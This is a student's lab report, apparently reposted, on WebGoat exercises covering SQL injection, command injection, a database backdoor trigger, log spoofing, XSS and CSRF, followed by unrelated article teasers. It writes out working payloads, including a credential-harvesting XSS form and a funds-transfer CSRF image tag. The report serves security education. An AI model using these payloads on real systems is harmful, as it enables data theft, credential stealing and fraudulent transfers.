20145227鄢曼君《网络对抗》Web安全基础实践

20145227鄢曼君《网络对抗》Web安全基础实践

实验后回答问题

1.SQL注入攻击原理,如何防御?

  • SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
  • 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。
  • 防御:对输入的数据进行过滤,过滤掉敏感字符。加密数据库。

2.XSS攻击的原理,如何防御?

  • XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。攻击者利用网站漏洞,输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
  • 防御:检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。还有就是在表单提交或者url参数传递前,对需要的参数进行过滤。

3.CSRF攻击原理,如何防御?

  • CSRF全名是Cross-site request forgery,是一种对网站的恶意利用。CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,通过伪装来自受信任用户的请求来利用受信任的网站。它危害性甚至比XSS更大。比如实验中的转账之类的。
  • 防御:用户在浏览其它站点前登出站点;在浏览器会话结束后清理浏览器的cookie;尽量不要在页面的链接中暴露用户隐私信息;避免全站通用的cookie,严格设置cookie的域。

实验感想

  • 这次实验确实内容很多,但是都还挺有意思的,而且我也学到了一些东西。这次的实验感觉与我们生活息息相关,其实我们之前学的很多课程都有涉及到web安全,这一次的Web安全基础实践又让我了解到了更多的关于这方面的攻击手段等,相信以后登录网页或者点击链接之类的我会更加谨慎。

实践过程

  • 开启webgoat,打开WebGoat:java -jar webgoat-container-7.0.1-war-exec.jar

887843-20170511164407441-850703245.png

887843-20170511164416066-1496467825.png

  • 然后在浏览器输入localhost:8080/WebGoat,进入webgoat。

SQL练习

String SQL Injection(SQL字符串注入)

  • 这个题的题目大意是:这个表单允许使用者查询他们的信用卡号,使用SQL注入让所有的信用卡号都看得见。

887843-20170511164757472-789609493.png

  • 我们构造一个永真式“1”,那么不管前面的WHERE是否成立都能执行,所以构造语句'or 1='1,成功得到了全部的信用卡号。

887843-20170511164942176-952423034.png

Numeric SQL Injection(数字型SQL注入)

  • 这个题大概意思是这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据。
  • 由于没办法直接输入,无法在前端进行SQL注入,我们可以从捕获包中修改。
  • 首先启动BurpSuite。然后设置代理“Proxy”的“Options”选项,默认是8080端口被占用时需要添加一个新的端口8888,点击add;添加后勾选。

887843-20170511165415613-1811682492.png

  • 然后设置浏览器的代理:打开浏览器右侧的“更多”选项卡,preference-advanced-settings
  • 这相当于将burpsuite当成中间服务器,每个数据包都流过它。
  • 设置好之后回到题目,任意选择一项,点击GO,然后回到burpsuite。发现多了捕获的包。然后右键send to repeater ,我们修改station值从为101 为 101 or 1=1,点击GO,可以看到右边response包中的SQL语句为SELECT * FROM weather_data WHERE station = 101 or 1=1

887843-20170511165734207-562688787.png

  • 回到Proxy中点击Intercept is on对剩下的包不作处理,回到火狐浏览器发现已经成功了!

887843-20170511170201769-1431472166.png

Command Injection(命令注入)

  • 题目要求能够在目标主机上执行系统命令,我发现可以通过火狐浏览器下的一个扩展Firebug对源代码进行修改,例如在BackDoors.help旁边加上& netstat -an & ipconfig

887843-20170511170541129-1200109568.png

  • 选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

887843-20170511170633769-1966875293.png

Database Backdoors

  • 输入注入语句:101; update employee set salary=9000,成功把该用户的工资涨到了9000。这种给别人涨工资的感觉好棒啊~

887843-20170511175739847-491148228.png

  • 接下来使用语句101;CREATE TRIGGER ymjBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145227@qq.com' WHERE userid = NEW.userid 创建一个后门,把表中所有的邮箱和用户ID都设为我的。所有人的工资都邮到我这里吧,哈哈哈

887843-20170511225847535-599421773.jpg

Blind Numeric SQL Injection

  • 题目要求是得到一个存放在pins表中值pin的内容,行号cc_number=1111222233334444,是一个int型的数据。
  • 然后使用BurpSuite进行拦截,拦截后action--send to intruder进行暴力破解,使用sniper模式,选择10000进行数字爆破(选择前先clear将默认的爆破点清除),从1到10000,步长为1。可以发现2364的报文长度明显和其他不一样,那这个值就应该就是2364:

887843-20170511181804191-1692400403.png

Log Spoofing(日志欺骗)

  • 这道题大概意思是说,我们输入的用户名会被追加到日志文件中。所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”,例如在User Name文本框中输入ymj%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行符:

887843-20170511171104832-1975478821.png

  • 攻击成功:

887843-20170511171131176-1104297980.png

LAB:SQL Injection

Stage 1:String SQL Injection

  • 题目要求:使用字符串SQL注入在没有正确密码的情况下登录账号boss。
  • 以用户Neville登录,在密码栏中输入' or 1=1 --进行SQL注入,但是登录失败。
  • 查看了一下网页源码,发现输入框对输入的字符长度进行了限制,最多只允许输入8个字符:

887843-20170511173141613-1476957823.png

  • 于是我对字符长度进行了修改,然后重新登录,登录成功!

887843-20170511173237660-2026518734.png

Stage 3:Numeric SQL Injection

  • 题目要求:通过注入语句,浏览到原本无法浏览的信息。通过一个普通员工的账户larry,浏览其BOSS的账户信息。
  • 首先我们用上一题的办法登录Larry的账号!在密码框里输入' or 1=1 --,登录后发现我们只能看见Larry一个人的工资信息.

887843-20170511174717113-1391510370.png

  • 浏览员工信息的按钮是ViewProfile.在网页代码中分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,我们要达到通过Larry来浏览老板账户信息的目的,把其中的value值改为101 or 1=1 order by salary desc --,这样老板的信息就会被排到第一个:

887843-20170511174847551-831669747.png

  • 然后成功查看到老板的信息!

887843-20170511174935379-521945832.png

XSS攻击

Phishing with XSS

  • 这个题目我们要在搜索框中输入XSS攻击代码:
</form><script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} </script>
<form name="phish">
<br>
<br>
<HR><H2>This feature requires account login:</H2>
<br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass">
<br><input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
  • 在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单,然后输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你:

887843-20170511191812722-657732859.png

  • 攻击成功,结果如下图:

887843-20170511191913191-125896300.png

Stored XSS Attacks

  • 题目要求:要创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容。
  • 直接在title里随便输入,然后在message中输入一串代码,比如:<script>alert("hhh5227lll!");</script> 提交后,再次点击刚刚创建的帖子,成功弹出窗口,说明攻击成功!

887843-20170511192152363-1024618550.png

Reflected XSS Attacks

  • 当我们输入错误的用户信息后,服务器校验输入有误,会返回错误页面并将错误内容展示给我们看:

887843-20170511192320113-1088217941.png

  • 如果我们将带有攻击性的URL作为输入源,比如<script>alert("hhh20145227ymj");</script>,就会弹出对话框:

887843-20170511192458847-2083702971.png

  • 攻击成功!

887843-20170511192631769-2098055102.png

  • 这个看上去和上面很相似,但是原理不同,上面的是存储式的,这个是通过写在url里面达到的效果,里面的脚本也可以改写成其他恶意的内容。

CSRF攻击

Cross Site Request Forgery

  • 题目要求:需要写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。
  • 查看自己电脑的Screen和menu的值:

887843-20170511193036238-923767324.png

  • 然后在message里面输入<img src="http://localhost:8080/WebGoat/attack?Screen=291&menu=900&transferFunds=转账金额"/>就会发出一个转钱的请求,盗取钱财。
  • 提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的钱,达到CSRF攻击的目的。

887843-20170511193401035-1588890087.png

CSRF Prompt By-Pass

  • 这个就是利用CSRF进行冒名操作转账,不过这次包括了两个请求,一是转账请求,二是确认转账成功请求,即需要额外传递两个参数给服务器(transferFunds=4000,transferFunds=CONFIRM)。直接在message中写入攻击代码,然后提交:

887843-20170511193734144-1401466412.png

  • 点击了CONFIRM按钮,成功实现:

887843-20170511193826847-64906376.png

转载于:https://www.cnblogs.com/m3182218/p/6842135.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/254630.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[转]Xvid参数详解

众所周知&#xff0c;Mencoder以其极高的压缩速率和不错的画质赢得了很多朋友的认同&#xff01; 原来用Mencoder压缩Xvid的AVI都是使用Xvid编码器的默认设置&#xff0c;现在我来给大家冲冲电&#xff0c;讲解一下怎样使用Mencoder命令行高级参数制作Xvid编码格式AVI影片。经…

常用的Meta标签写法和作用

页面关键词  <meta name"keywords" content"your tags" />  页面描述  <meta name"description" content"150 words" />  搜索引擎索引方式  <meta name"robots" content"index,follow"…

从库存管理系统,体验活字格强大的移动端应用开发能力

活字格&#xff0c;开放易用的 Web 应用生成平台 随着移动互联网时代的来临&#xff0c;企业在移动端管理和运营的需求急剧增加&#xff0c;这就要求企业应用系统要能做到工作流程自动规范、移动端操作流畅便捷、协同办公快速高效、业务流程高度自定制、需求变更随时修改等。 活…

Xvid编码器流程(基于xvid1.1.0)

调用Xvid编码器流程(基于xvid1.1.0) 编者按&#xff1a;本文为Xvid最新源代码V1.1.0版本的学习笔记&#xff0c;内 部资料&#xff0c;仅供学习参考&#xff0c;未经授权&#xff0c;不得转载 xvid有两种编码方式&#xff1a;single pass和twopass single pass模式编码简…

置换矩阵

来源&#xff1a;百度百科 定义&#xff1a; 设P 是一个 mn 的 (0,1) 矩阵&#xff0c;如 m≤n且 PxPtE&#xff0c;则称 P为一个 mn的置换矩阵。其中Pt是P的转置矩阵&#xff0c;E是m阶单位方阵。 判定条件&#xff1a; 定理 1 当 m≦n时&#xff0c;一个 mn 的(0,1) 矩阵P为置…

halcon Matching-3D 3D匹配,持续更新

目录Matching-3D 3D匹配Deformable Surface-Based基于可变形表面1. add_deformable_surface_model_reference_point2.add_deformable_surface_model_sample3. clear_deformable_surface_matching_result4.clear_deformable_surface_model5. create_deformable_surface_model6. …

CVE-2009-3459

Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器。 Adobe Reader和Acrobat 7.1.4之前的7.x版本&#xff0c;8.1.7之前的8.x版本以及9.2之前的9.x版本中存在基于堆的缓冲区溢出漏洞。远程攻击者可借助触发内存破坏的特制PDF文件执行任意代码。 转…

leetcode-665-Non-decreasing Array

题目描述&#xff1a; Given an array with n integers, your task is to check if it could become non-decreasing by modifying at most 1 element. We define an array is non-decreasing if array[i] < array[i 1] holds for every i (1 < i < n). Example 1: I…

halcon 3D Object Model 三维物体模型算子,持续更新

目录3D Object Model 三维物体模型Creation创建1.clear_object_model_3d2.copy_object_model_3d3. deserialize_object_model_3d4. gen_box_object_model_3d5. gen_cylinder_object_model_3d6. gen_empty_object_model_3d7. gen_object_model_3d_from_points8. gen_plane_objec…

linux下kafka与zookeeper集群部署

*********************************配置主机名&#xff0c;通过主机名连接机器********************************* 比如说&#xff0c;已经有了三台主机 1&#xff0c;在linux上设置hostname&#xff0c;通过hostname来访问linux虚拟机 1.1. 修改hosts文件 vim /etc/hosts#/etc…

调用Xvid编码器流程(基于xvid1.1.0)

xvid有两种编码方式&#xff1a;single pass和twopass single pass模式编码简单&#xff0c;速度也快&#xff0c;但最终效果不如twopass。 twopass就是视频压制需要经过两次编码&#xff0c;分别为twopass&#xff0d;1st pass&#xff08;简称1pass&#xff09;和twopass…

关于box-shadow属性的一点心得

一般我用到box-shadow都是用于诸如按钮&#xff0c;文本块&#xff0c;某些图标&#xff0c;css类似为: box-shadow: 1px 1px 5px rgba(0, 0, 0, .8);这样&#xff0c;样式看上去会更加柔和&#xff0c;或者增加了立体感。 我个人的理解上&#xff0c;box-shadow的本质就是本体…

Laravel核心解读--控制器

控制器 控制器能够将相关的请求处理逻辑组成一个单独的类&#xff0c; 通过前面的路由和中间件两个章节我们多次强调Laravel应用的请求在进入应用后首现会通过Http Kernel里定义的基本中间件 protected $middleware [\Illuminate\Foundation\Http\Middleware\CheckForMaintena…

C#枚举、值、字符串的相互转换

目录枚举的定义使用方式优点代码示例枚举的定义 枚举是整数类型&#xff0c;用户自定义的整数类型的一个集合。 使用方式 public enum A {a0,b1,c2 }注意&#xff1a;枚举定义的不同变量之间要用“&#xff0c;”分割&#xff0c;结尾不需要加上“&#xff0c;” 优点 可以…

制作404页面的重要性

在网站的运行过程中会面临很多问题&#xff0c;当用户搜索页面时&#xff0c;会提示服务器出错&#xff0c;请求的页面不存在&#xff0c;程序配置错误等问题。用户请求浏览网页碰到这些的情况时&#xff0c;会自动跳出系统默认的错误提示&#xff0c;对用户体验造成不好的感触…

明晰C++内存分配的五种方法的区别

在C中&#xff0c;内存分成5个区&#xff0c;他们分别是堆、栈、自由存储区、全局/静态存储区和常量存储区。 栈&#xff0c;就是那些由编译器在需要的时候分配&#xff0c;在不需要的时候自动清楚的变量的存储区。里面的变量通常是局部变量、函数参数等。 堆&#xff0c;就是那…

【BZOJ-4631】踩气球 线段树 + STL

4631: 踩气球 Time Limit: 10 Sec Memory Limit: 256 MBSubmit: 224 Solved: 114[Submit][Status][Discuss]Description 六一儿童节到了&#xff0c; SHUXK 被迫陪着M个熊孩子玩一个无聊的游戏&#xff1a;有N个盒子从左到右排成一排&#xff0c;第i个盒子里装着Ai个气球。SH…

3D Reconstruction三维重建halcon算子,持续更新

目录3D Reconstruction三维重建Binocular Stereo双目立体binocular_disparitybinocular_disparity_mgbinocular_disparity_msbinocular_distancebinocular_distance_mgbinocular_distance_msdisparity_image_to_xyzdisparity_to_distancedisparity_to_point_3ddistance_to_disp…

遗传算法初级

遗传算法是一种基于仿生学的计算机算法&#xff0c;通过模拟自然进化和优胜劣汰法则来搜索问题的最优解(我会说这其实就是稍微改良了一下的暴搜&#xff1f;) 它是由美国的J.Holland于1975年提出来的玄学概率学混合暴力搜索方法&#xff0c;广泛适用于寻找算法优解、机器学习、…

C++ vector容器类型

vector类为内置数组提供了一种替代表示&#xff0c;与string类一样 vector 类是随标准 C引入的标准库的一部分 &#xff0c;为了使用vector 我们必须包含相关的头文件 &#xff1a;#include <vector> 使用vector有两种不同的形式&#xff0c;即所谓的数组习惯和 STL习惯…